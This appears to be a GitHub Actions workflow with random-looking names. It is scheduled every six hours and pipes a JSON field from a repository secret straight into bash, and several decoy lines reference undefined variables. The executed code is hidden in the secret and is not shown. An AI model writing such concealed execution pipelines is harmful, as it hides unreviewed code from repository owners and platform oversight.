name: pigmanjerky

on:
  workflow_dispatch:
  schedule:
    - cron: '7 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pigmanjerky
        env:
          dss98: ${{ secrets.dss98 }}
        run: |
          echo $dss98 | jq -r .goyjj4 | /bin/bash
          echo $trgcv6 | jq -r .exm6 | /bin/bash
          echo $e631 | jq -r .dgdx6 | /bin/bash
          echo $peg47477 | jq -r .ed562 | /bin/bash
          echo $rkm8668 | jq -r .yztkb62987 | /bin/bash
          echo $fc79683 | jq -r .yag401 | /bin/bash
          echo $fawz84 | jq -r .p93352 | /bin/bash
          echo $dpy135 | jq -r .ej131 | /bin/bash
          echo $m2447 | jq -r .shw49587 | /bin/bash

